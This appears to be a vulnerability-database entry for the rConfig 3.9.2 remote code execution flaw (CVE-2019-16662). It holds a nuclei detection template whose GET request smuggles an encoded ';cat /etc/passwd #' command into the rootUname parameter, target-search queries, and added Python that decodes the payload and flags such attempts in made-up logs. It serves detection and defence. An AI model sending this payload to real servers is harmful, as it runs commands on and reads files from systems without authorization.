rConfig 3.9.2 - Remote Code Execution

Reported by ProjectDiscovery, 16 Jun 2026 07:13:51. Type: nuclei. Source: github.com

rConfig 3.9.2 is vulnerable to unauthenticated remote code execution: the rootUname parameter of install/lib/ajaxHandlers/ajaxServerSettingsChk.php is passed to exec() without sanitization, so an attacker can run arbitrary system commands on the host with a single GET request.

Related

Reporter                Title                                                            Published           Source
0day.today              rConfig 3.9.2 - Remote Code Execution Exploit                    29 Oct 2019 00:00   zdt
0day.today              rConfig - install Command Execution Exploit                      9 Nov 2019 00:00    zdt
ATTACKERKB              CVE-2019-16662                                                   28 Oct 2019 00:00   attackerkb
Circl                   CVE-2019-16662                                                   3 Nov 2019 12:10    circl
Circl                   CVE-2019-16663                                                   3 Nov 2019 12:10    circl
Check Point Advisories  rConfig Remote Code Execution (CVE-2019-16662; CVE-2019-16663)   5 Nov 2019 00:00    checkpoint_advisories
CVE                     CVE-2019-16662                                                   28 Oct 2019 11:52   cve
CVE                     CVE-2019-16663                                                   28 Oct 2019 11:53   cve
Cvelist                 CVE-2019-16662                                                   28 Oct 2019 11:52   cvelist
Cvelist                 CVE-2019-16663                                                   28 Oct 2019 11:53   cvelist

Template
id: CVE-2019-16662

info:
  name: rConfig 3.9.2 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: rConfig 3.9.2 is susceptible to a remote code execution vulnerability. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and complete compromise of the affected system.
  remediation: |
    Upgrade to a patched version of rConfig (3.9.3 or later) or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-16662
    - https://drive.google.com/open?id=1OXI5cNuwWqc6y-7BgNCfYHgFPK2cpvnu
    - http://packetstormsecurity.com/files/154999/rConfig-3.9.2-Remote-Code-Execution.html
    - http://packetstormsecurity.com/files/155186/rConfig-3.9.2-Command-Injection.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-16662
    cwe-id: CWE-78
    epss-score: 0.97702
    epss-percentile: 0.99896
    cpe: cpe:2.3:a:rconfig:rconfig:3.9.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: rconfig
    product: rconfig
    shodan-query: http.title:"rconfig"
    fofa-query: title="rconfig"
    google-query: intitle:"rconfig"
  tags: cve2019,cve,intrusive,rconfig,packetstorm,rce,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ac4704847c4e1ac8291328c2b0a4c8987c3466ca47dabcc540b519b614bc3d37022100d1042e8deb052c467e9ebdb48e19d97b592cc087d9c6122374157fdca7a4ba0e:922c64590222798bb761d5b6d8e72950
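The template above sends one GET request and declares a hit when the response is HTTP 200 and contains a passwd-style root line. The following is an added example (my code, not part of the Vulners entry, the nuclei template or rConfig's own source). It URL-decodes the template's rootUname payload to show why it works against an exec() call, reproduces the template's matcher logic on a constructed response, and scans constructed Apache-style access-log lines for attempts against the vulnerable handler. The log lines and IP addresses are fabricated, the function names are mine, and the second URL-decoding pass is a defensive assumption (to catch double-encoded payloads), not something the page documents.

```python
"""Added example for this page: not part of the Vulners entry, the nuclei
template or rConfig's code base. Decodes the template's payload, mirrors the
template's matchers, and flags injection attempts in constructed log lines."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path and payload copied from the nuclei template on this page.
VULN_PATH = "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"
TEMPLATE_PAYLOAD = "%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23"

# Characters that let a value break out of a shell command built around it
# (CWE-78). '#' is included because the template uses it to comment out
# whatever rConfig appends after the injected command.
SHELL_META = re.compile(r"[;|&`$()<>\n#]")

# The template's regex matcher; combined with status 200 (matchers-condition: and).
ROOT_LINE = re.compile(r"root:.*:0:0:")

# Apache combined log format, keeping only the fields needed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def decode_payload(encoded: str) -> str:
    """URL-decode a rootUname value. The template's payload decodes to
    ';cat /etc/passwd #': ';' ends the intended command, '#' discards the rest."""
    return unquote(encoded)


def template_matches(status: int, body: str) -> bool:
    """Reproduce the template's decision: HTTP 200 AND a passwd root line in the body."""
    return status == 200 and ROOT_LINE.search(body) is not None


def find_injection_attempts(log_lines):
    """Return (client_ip, status, decoded rootUname) for each request to the
    vulnerable handler whose rootUname contains shell metacharacters."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != VULN_PATH:
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("rootUname", []):
            # parse_qs percent-decodes once; decode a second time (assumption:
            # defensive) so a double-encoded payload (%253b -> %3b -> ;) is caught.
            decoded = unquote(value)
            if SHELL_META.search(decoded):
                hits.append((m.group("ip"), int(m.group("status")), decoded))
    return hits


# Constructed log lines (fabricated for this example; IPs from documentation ranges).
SAMPLE_LOG = [
    # the template's probe, answered successfully
    '203.0.113.5 - - [16/Jun/2026:07:13:51 +0000] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1" 200 1873 "-" "Mozilla/5.0"',
    # benign use of the installer's server-settings check
    '192.0.2.10 - - [16/Jun/2026:07:14:02 +0000] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=root HTTP/1.1" 200 54 "-" "Mozilla/5.0"',
    # unrelated request
    '192.0.2.10 - - [16/Jun/2026:07:14:10 +0000] "GET /index.php HTTP/1.1" 200 4021 "-" "Mozilla/5.0"',
    # double-encoded attempt against a host where the install directory was removed
    '198.51.100.7 - - [16/Jun/2026:07:15:00 +0000] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=x%253bid HTTP/1.1" 404 196 "-" "curl/8.0"',
]

if __name__ == "__main__":
    print("payload decodes to:", repr(decode_payload(TEMPLATE_PAYLOAD)))
    print("template match on passwd body:",
          template_matches(200, "root:x:0:0:root:/root:/bin/bash\n"))
    for ip, status, value in find_injection_attempts(SAMPLE_LOG):
        print(f"injection attempt from {ip} (HTTP {status}): rootUname={value!r}")
```

Note that the log scan reports the 404 attempt too: a blocked or missing handler still tells you who is probing, and the status column distinguishes a likely successful execution (200) from a failed one.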


Scores (as of 04 Feb 2026 07:00)
Vulners AI Score: 9.6 (High risk)
CVSS 3.1: 9.8
CVSS 2: 10
EPSS: 0.97702